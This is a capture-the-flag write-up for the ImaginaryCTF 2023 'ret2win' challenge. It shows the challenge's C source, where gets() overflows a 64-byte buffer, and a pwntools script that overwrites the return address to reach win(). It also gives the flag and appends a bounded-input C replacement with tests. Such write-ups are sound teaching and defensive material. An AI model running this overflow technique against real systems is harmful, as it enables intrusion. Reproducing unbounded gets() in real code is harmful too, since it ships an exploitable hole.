2023 ImaginaryCTF - ret2win
Description
Can you overflow the buffer and get the flag? (Hint: if your exploit isn’t working on the remote server, look into stack alignment)
nc ret2win.chal.imaginaryctf.org 1337
Attached
Analysis
The attached source file:
    #include <stdio.h>
    #include <unistd.h>

    int main() {
        char buf[64];
        gets(buf);
    }

    int win() {
        system("cat flag.txt");
    }
gets() reads input with no length limit, so a line longer than the 64-byte buf overflows the stack and overwrites main's saved return address.
Solution
    from pwn import *

    conn = remote('ret2win.chal.imaginaryctf.org', 1337)
    print(conn.recv().decode())
    # 0x48 bytes of padding, then the new return address packed as a 64-bit little-endian value
    conn.sendline(b'A' * 0x48 + p64(0x401182))
    print(conn.recv().decode())
The flag is
ictf{r3turn_0f_th3_k1ng?}
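For comparison, here is a bounded replacement for the gets(buf) call in the challenge source. It is an added example, not part of the challenge or the original write-up; read_line_bounded, try_input and BUF_SIZE are hypothetical names, and the input is constructed to match the lengths used above.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64 /* same size as buf in the challenge source */

/* Read one line into dst without ever writing more than cap bytes.
 * Returns the stored length, -1 on EOF/error, or -2 when the line did not
 * fit (the rest of that line is drained so it cannot leak into later reads). */
int read_line_bounded(FILE *in, char *dst, size_t cap)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return (int)(len - 1);
    }
    int c = getc(in);            /* no newline stored: peek at what follows */
    if (c == EOF || c == '\n')
        return (int)len;         /* line fit exactly, or input ended */
    while ((c = getc(in)) != EOF && c != '\n')
        ;                        /* over-long line: discard the excess */
    return -2;
}

/* Constructed input: n 'A' bytes and a newline, written to a temp file.
 * guard sits next to buf in the struct; -4 would mean it was modified. */
int try_input(size_t n)
{
    struct { char buf[BUF_SIZE]; unsigned long guard; } f = { {0}, 0xC0FFEEUL };
    FILE *in = tmpfile();
    if (in == NULL)
        return -3;
    for (size_t i = 0; i < n; i++)
        fputc('A', in);
    fputc('\n', in);
    rewind(in);
    int r = read_line_bounded(in, f.buf, sizeof f.buf);
    fclose(in);
    return f.guard == 0xC0FFEEUL ? r : -4;
}

int main(void)
{
    printf("10 bytes   -> %d\n", try_input(10));
    printf("63 bytes   -> %d\n", try_input(63));
    printf("0x50 bytes -> %d\n", try_input(0x48 + 8)); /* length of the payload above */
    return 0;
}
```

With this reader, a line as long as the payload is rejected with -2 and the bytes beyond buf are never written.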